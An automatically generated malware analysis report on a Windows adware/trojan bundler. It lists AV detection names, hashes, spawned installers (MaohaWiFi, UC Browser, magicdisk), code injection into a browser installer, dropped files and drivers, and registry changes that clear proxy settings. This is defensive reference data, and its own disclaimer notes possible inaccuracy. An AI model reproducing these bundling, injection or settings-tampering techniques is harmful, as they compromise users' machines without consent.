Gen.Variant.Application.Razy.62899_25061c58cd

by malwarelabrobot on May 31st, 2017 in Malware Descriptions.

Gen:Variant.Application.Razy.62899 (BitDefender), not-a-virus:HEUR:AdWare.Win32.Sokuxuan.gen (Kaspersky), Adware.Win32.Sokuxuan (VIPRE), Gen:Variant.Application.Razy.62899 (B) (Emsisoft), Adware-Elex-FGV (McAfee), Trojan.Gen.2 (Symantec), PUA.Eszjuxuan (Ikarus), Gen:Variant.Application.Razy (FSecure), Win32/DH{TiRX?} (AVG), Gen:Variant.Application.Razy.62899 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 25061c58cd4d24822e6f155588e81efd
SHA1: 7bbe6dec2b49fd4f14e8c301b248b385f39f7dc3
SHA256: 1a8c28b0d96a012177bdbe95c33858adc935507e56a43f709167d1cfb5115b5f
SSDeep: 24576:06KDRBwFhi8opVTOQeTRE O9IQJSRYLgtvkHI2KxYLd75MqhSIBFAH/Hu9U:06KDRSFhsOQt9IQSYLgm4xY9kIB6fIU
Size: 1731072 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-05-16 10:54:37
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

setup.3.15.exe:3396
MaohaWifiSvr.exe:3768
MaohaWifiSvr.exe:632
MaoHaWiFiSetup_265.exe:3544
%original file name%.exe:2624

The Trojan injects its code into the following process(es):

UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe:3920

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.3.15.exe:3396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\mgdisk\mgdisk.ssf (2866 bytes)
%Program Files%\mgdisk\x64\cryptfd.sys (7424 bytes)
%Program Files%\mgdisk\mgdinst.dll (17121 bytes)
%Program Files%\mgdisk\uninst.exe (5573 bytes)
%Program Files%\mgdisk\sqlite3.dll (17369 bytes)
C:\Windows\System32\drivers\cryptfd.sys (6360 bytes)
%Program Files%\mgdisk\sciter32.dll (94241 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\mgdinst.dll (34242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\System.dll (23 bytes)
C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
%Program Files%\mgdisk\mgdisk.exe (8126 bytes)
%Program Files%\mgdisk\inst.db (7 bytes)
C:\Users\Public\Desktop\magicdisk.lnk (937 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk\uninstall magicdisk.lnk (955 bytes)
%Program Files%\mgdisk\zlib.dll (925 bytes)
%Program Files%\mgdisk\x86\cryptfd.sys (6784 bytes)
%Program Files%\mgdisk\mgdisk.db3 (3 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk\magicdisk.lnk (955 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp (0 bytes)
%Program Files%\mgdisk\x64\cryptfd.sys (0 bytes)
%Program Files%\mgdisk\x86\cryptfd.sys (0 bytes)
%Program Files%\mgdisk\x86 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\System.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy89C8.tmp (0 bytes)
%Program Files%\mgdisk\x64 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\mgdinst.dll (0 bytes)

The process MaohaWifiSvr.exe:632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE (684 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ECF3006D44DA211141391220EE5049F4 (42 bytes)
C:\Windows\Temp\CabDD63.tmp (48 bytes)
C:\Windows\Temp\TarDD64.tmp (2712 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ECF3006D44DA211141391220EE5049F4 (412 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE (1 bytes)

The Trojan deletes the following file(s):

C:\Windows\Temp\TarDD64.tmp (0 bytes)
C:\Windows\Temp\CabDD63.tmp (0 bytes)

The process MaoHaWiFiSetup_265.exe:3544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Maoha\MaohaAP\gzipdll.dll (306 bytes)
%Program Files%\Maoha\MaohaAP\APDefault.ini (2 bytes)
%Program Files%\Maoha\MaohaAP\WifiDhcpSvr.dll (214 bytes)
C:\Users\"%CurrentUserName%"\Desktop\MaohaWiFi.lnk (1 bytes)
%Program Files%\Maoha\MaohaAP\driver\maohawifipronat64.cat (14 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\app_tj.png (723 bytes)
%Program Files%\Maoha\MaohaAP\ICSDHCP.ini (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (52 bytes)
%Program Files%\Maoha\MaohaAP\Uninst.dar0 (1 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWifiWin7.dll (264 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\logo.png (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75CD.tmp (51 bytes)
%Program Files%\Maoha\MaohaAP\driver\WifiProNat64.inf (3 bytes)
%Program Files%\Maoha\MaohaAP\driver\MaohaWifiProNat64.sys (43 bytes)
%Program Files%\Maoha\MaohaAP\driver\MaohaWifiProNat.sys (38 bytes)
%Program Files%\Maoha\MaohaAP\MaohaDevMng.dll (195 bytes)
%Program Files%\Maoha\MaohaAP\Reg\RasMan_XP.bat (24 bytes)
%Program Files%\Maoha\MaohaAP\driver\DriverInstall_X64.exe (115 bytes)
%Program Files%\Maoha\MaohaAP\RaWifi.dll (185 bytes)
%Program Files%\Maoha\MaohaAP\Reg\RasMan_XP.reg (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75BB.tmp (51 bytes)
%Program Files%\Maoha\MaohaAP\driver\WifiProNat.inf (3 bytes)
%Program Files%\Maoha\MaohaAP\ICSDHCP.dll (618 bytes)
%Program Files%\Maoha\MaohaAP\res\support.dat (35 bytes)
%Program Files%\Maoha\MaohaAP\7z.dll (921 bytes)
%Program Files%\Maoha\MaohaAP\maohasubstat.dll (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab8B71.tmp (52 bytes)
%Program Files%\Maoha\MaohaAP\Updater\MaohaWiFiUpg.exe (538 bytes)
%Program Files%\Maoha\MaohaAP\drv64\drv64.exe (194 bytes)
%Program Files%\Maoha\MaohaAP\Reg\RasMan_WIN7.bat (26 bytes)
%Program Files%\Maoha\MaohaAP\dt.exe (13 bytes)
%Program Files%\Maoha\MaohaAP\uninstall.dll (598 bytes)
%Program Files%\Maoha\MaohaAP\ext\5.dll (27 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWifiBase.dll (287 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\MaohaWiFi.lnk (1 bytes)
%Program Files%\Maoha\MaohaAP\MaoHaCD.dll (50 bytes)
%Program Files%\Maoha\MaohaAP\maohawificfg.ini (60 bytes)
%Program Files%\Maoha\MaohaAP\MyTheme.dll (134 bytes)
%Program Files%\Maoha\MaohaAP\Updater\CheckUpdate.dll (256 bytes)
%Program Files%\Maoha\MaohaAP\ResLoader.dll (112 bytes)
%Program Files%\Maoha\MaohaAP\ext\6.dll (70 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar8B72.tmp (2712 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\卸载MaohaWiFi.lnk (1 bytes)
%Program Files%\Maoha\MaohaAP\welcome\index.html (6 bytes)
%Program Files%\Maoha\MaohaAP\ext\3.dll (19 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWifiSvr.exe (168 bytes)
%Program Files%\Maoha\MaohaAP\Reg\RasMan_WIN7.reg (16 bytes)
%Program Files%\Maoha\MaohaAP\tipsdll.dll (237 bytes)
%Program Files%\Maoha\MaohaAP\WifiHelp64.exe (71 bytes)
%Program Files%\Maoha\MaohaAP\pcidetect.dll (238 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\litlogo.png (1 bytes)
%Program Files%\Maoha\MaohaAP\drv64\DIFxAPI.dll (519 bytes)
%Program Files%\Maoha\MaohaAP\softconfig.dll (1595 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75BC.tmp (2712 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\app_logo.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (1720 bytes)
%Program Files%\Maoha\MaohaAP\SmartAction.dll (426 bytes)
%Program Files%\Maoha\MaohaAP\RaAPAPI.dll (1 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWifiXP.dll (157 bytes)
%Program Files%\Maoha\MaohaAP\res\MaohaWiFiDir.ico (226 bytes)
%Program Files%\Maoha\MaohaAP\Uninst.dar1 (18 bytes)
%Program Files%\Maoha\MaohaAP\MaoHaWiFiNet.sys (618 bytes)
%Program Files%\Maoha\MaohaAP\driver\DriverTool.dll (112 bytes)
%Program Files%\Maoha\MaohaAP\driver\DriverInstall.exe (101 bytes)
%Program Files%\Maoha\MaohaAP\YunExplorer.exe (680 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75CE.tmp (2712 bytes)
%Program Files%\Maoha\MaohaAP\MaoHaWiFiNet64.sys (1 bytes)
%Program Files%\Maoha\MaohaAP\ApSetting.ini (487 bytes)
%Program Files%\Maoha\MaohaAP\tips.exe (569 bytes)
%Program Files%\Maoha\MaohaAP\DIFxAPI.dll (323 bytes)
%Program Files%\Maoha\MaohaAP\res\MaohaWiFi.ico (226 bytes)
%Program Files%\Maoha\MaohaAP\SkinBase.dll (125 bytes)
%Program Files%\Maoha\MaohaAP\PhonetypeData.dat (24 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWiFi.exe (50 bytes)
%Program Files%\Maoha\MaohaAP\res\Skin\Skin.rdb (260 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\info.png (9 bytes)
%Program Files%\Maoha\MaohaAP\Uninstall.exe (1399 bytes)
%Program Files%\Maoha\MaohaAP\ext\1.dll (23 bytes)
%Program Files%\Maoha\MaohaAP\HWID.ini (11 bytes)
%Program Files%\Maoha\MaohaAP\ext\4.dll (18 bytes)
%Program Files%\Maoha\MaohaAP\pcid.dll (244 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\MaohaWiFi.lnk (1 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75CE.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar8B72.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75CD.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75BC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75BB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab8B71.tmp (0 bytes)

The process UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe:3920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\chrome.7z (996985 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Bin\ChannelU.dll (26364175 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\aavc.ini (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\chrome.packed.7z (59963 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\UCBrowserSetup.exe (70898 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\config.ini (195 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\7z.dll (1841 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\config.ini (0 bytes)

The process %original file name%.exe:2624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26515\MaoHaWiFiSetup_265.exe (1167614 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp2624aaaaaa (3172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26512\UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe (81695 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26548\setup.3.15.exe (425601 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26515\MaoHaWiFiSetup_265.exe (0 bytes)
C:\Users\"%CurrentUserName%"\Desktop\MaohaWiFi.lnk (0 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26548\setup.3.15.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\MaohaWiFi.lnk (0 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\MaohaWiFi.lnk (0 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\卸载MaohaWiFi.lnk (0 bytes)

Registry activity

The process setup.3.15.exe:3396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}]
"UninstallString" = "%Program Files%\mgdisk\uninst.exe"

[HKLM\System\CurrentControlSet\services\cryptfd]
"Group" = "PNP_TDI"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}]
"DisplayName" = "magicdisk"

[HKLM\System\CurrentControlSet\services\cryptfd\Parameters]
"2959875004" = "E4 CD 69 0C 8E 09 AB 75 05 3E 32 A9 20 E7 BE DB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}]
"InstallLocation" = "%Program Files%\mgdisk"

[HKLM\System\CurrentControlSet\services\cryptfd]
"Start" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}]
"DisplayIcon" = "%Program Files%\mgdisk\mgdisk.exe"

The process MaohaWifiSvr.exe:3768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\IconCache.db,"

The process MaohaWifiSvr.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process MaoHaWiFiSetup_265.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"URLInfoAbout" = "http://www.maohawifi.com/"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Maoha\MaohaAP]
"Version" = "100080010"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"UninstallString" = "%Program Files%\Maoha\MaohaAP\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"Publisher" = "深圳市猫哈网络科技发展有限公司"
"EstimatedSize" = "11514"

[HKLM\SOFTWARE\Maoha\MaohaAP]
"AppPath" = "%Program Files%\Maoha\MaohaAP"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"DisplayVersion" = "1.0.8.10"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"HelpLink" = "http://www.maohawifi.com/"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Maoha\MaohaAP]
"AppPath" = "%Program Files%\Maoha\MaohaAP"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"DisplayIcon" = "%Program Files%\Maoha\MaohaAP\MaohaWiFi.exe"

[HKCU\Software\Maoha\MaohaAP]
"UnionID" = "265"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"NoModify" = "1"
"InstallLocation" = "%Program Files%\Maoha\MaohaAP"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"DisplayName" = "MaohaWiFi"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Maoha\MaohaAP]
"Version" = "100080010"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"InstallDate" = "20170530"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Maoha\MaohaAP]
"UnionID" = "265"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe:3920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASMANCS]
"EnableFileTracing" = "0"

"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
20e131fa17e8605d2484628420525c2a c:\Program Files\Maoha\MaohaAP\7z.dll
cf73c3a03582408d422d4f7a01190d00 c:\Program Files\Maoha\MaohaAP\DIFxAPI.dll
24d6f19ca07a2ac3bfd6ff1ab3896b85 c:\Program Files\Maoha\MaohaAP\ICSDHCP.dll
8dd69fb54e5c29e07b8725c3c19ccfbd c:\Program Files\Maoha\MaohaAP\MaoHaCD.dll
c610588fa9f5065f19d735cc72ad351a c:\Program Files\Maoha\MaohaAP\MaoHaWiFiNet.sys
292f9a2632605d6591e0ea6ed62b6726 c:\Program Files\Maoha\MaohaAP\MaoHaWiFiNet64.sys
82bfea273392f5fcb0f19fe1e62a4440 c:\Program Files\Maoha\MaohaAP\MaohaDevMng.dll
bde7beffd77d80bfbfd47399ba467e49 c:\Program Files\Maoha\MaohaAP\MaohaWiFi.exe
d83716a9bb89a83d1089cf7c5ef231e2 c:\Program Files\Maoha\MaohaAP\MaohaWifiBase.dll
993921373facaef60cb9f9e84aab8301 c:\Program Files\Maoha\MaohaAP\MaohaWifiSvr.exe
c23979c42db65b1d10e733e50ba90bd3 c:\Program Files\Maoha\MaohaAP\MaohaWifiWin7.dll
d3006eb32933300b7da1b121b74b7ce5 c:\Program Files\Maoha\MaohaAP\MaohaWifiXP.dll
cd4d3d1cfdce0becb435a970b8e6a576 c:\Program Files\Maoha\MaohaAP\MyTheme.dll
41fbc54be444b267ad13711b20cbe6e5 c:\Program Files\Maoha\MaohaAP\RaAPAPI.dll
1877c1fc206cc00f602f268c97217291 c:\Program Files\Maoha\MaohaAP\RaWifi.dll
14c49377642096f9a6d7f3dfc00044f2 c:\Program Files\Maoha\MaohaAP\ResLoader.dll
491c3dfceb37cde6fd0086ef5fc225fb c:\Program Files\Maoha\MaohaAP\SkinBase.dll
c1dd873243befea71d0dc939f38f5afd c:\Program Files\Maoha\MaohaAP\SmartAction.dll
53924a7da2fd9056b71b1dea9a35fb1c c:\Program Files\Maoha\MaohaAP\Uninstall.exe
e1ecdad5c7ff885de6f241437e7a44f9 c:\Program Files\Maoha\MaohaAP\Updater\CheckUpdate.dll
9b6e41d5fd9c63c709bda83c0359b7f9 c:\Program Files\Maoha\MaohaAP\Updater\MaohaWiFiUpg.exe
0f43af2015ee8f94e9b7061cedc8783d c:\Program Files\Maoha\MaohaAP\WifiDhcpSvr.dll
22c9997dcf3d23ede6dbe1ed6a3b0af1 c:\Program Files\Maoha\MaohaAP\WifiHelp64.exe
540a232e81e4e5d67c215af689515e3b c:\Program Files\Maoha\MaohaAP\YunExplorer.exe
072f2457e70e081384edd61c821c419b c:\Program Files\Maoha\MaohaAP\driver\DriverInstall.exe
0f43a42e493fbfdee5f8bd0999c3af20 c:\Program Files\Maoha\MaohaAP\driver\DriverInstall_X64.exe
ef7f7d21d627753e4148bc1724b4d639 c:\Program Files\Maoha\MaohaAP\driver\DriverTool.dll
2b903da63c57da124f22e1e79ccec479 c:\Program Files\Maoha\MaohaAP\driver\MaohaWifiProNat.sys
b8f760633541da35bcff7087e710bcb4 c:\Program Files\Maoha\MaohaAP\driver\MaohaWifiProNat64.sys
1a2e5109c2bb5c68d499e17b83acb73a c:\Program Files\Maoha\MaohaAP\drv64\DIFxAPI.dll
2fb4b755ba2e98ca459d420d34b3e3d7 c:\Program Files\Maoha\MaohaAP\drv64\drv64.exe
a3f1268c29c18452fa7aa902642710d3 c:\Program Files\Maoha\MaohaAP\dt.exe
cadb1a29c7863c1ddbec3e309741d915 c:\Program Files\Maoha\MaohaAP\ext\1.dll
a9b884aae19f1785fd51382809fded7f c:\Program Files\Maoha\MaohaAP\ext\3.dll
5d53b78f8d73e81d162d62876e4bd1cc c:\Program Files\Maoha\MaohaAP\ext\4.dll
dbb04e987b4a6b620bf1664b96db616e c:\Program Files\Maoha\MaohaAP\ext\5.dll
